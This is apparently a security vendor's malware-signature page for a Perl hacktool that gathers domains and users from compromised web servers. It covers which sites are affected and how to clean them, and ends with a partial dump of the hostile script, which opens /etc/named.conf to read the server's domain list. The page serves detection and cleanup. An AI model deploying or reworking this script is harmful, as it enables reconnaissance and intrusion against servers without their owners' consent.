Malware Signatures

  1. Home
  2. Malware Signatures
  3. pl.hacktool.information_gathering.001

pl.hacktool.information_gathering.001

Hacktools are specially crafted tools to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and bruteforcing passwords. Those tools most of the time hidden in the filesystem and were installed among with other malicious code throug a vulnerability or an already compromised server.
This tool gathers sensitive information from the server. In this case, domains and users.

Affecting

Any vulnerable website with perl support. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for suspicious eval() code inside your site's files. Also, you can sign up with us and let our team remove the malware for you.

Dump


#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/htmlnn";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>C0ded By web.sniper</title>
<style type="text/css">
.newStyle1 {
background-color: #000000;
font-family: "Courier New", Courier, monospace;
font-size: large;
font-weight: bold;
color: #FFFFFF;
}
.style1 {
text-align: center;
}
</style>
</head>

<body class="newStyle1">

<p class="style1"><font color="#C0C0C0"><span lang="ar-bh">[</font><font color="#FFFF00">~</font><font color="#C0C0C0">]
</font></span><font color="#C0C0C0">Server</font><font color="#FFFF00"><span lang="ar-bh">@</span></font><font color="#C0C0C0">User&#39;z
</font><font color="#FFFF00">:#<span lang="ar-bh">~</span></font></p>
<p class="style1"><font color="#FFFF00">WeB.Sniper <span lang="ar-bh">~ </span>
ll4@Hotmail.com</font></p>
';
open (d0mains, '/etc/named.conf') or $err=1;
@kr = <d0mains>;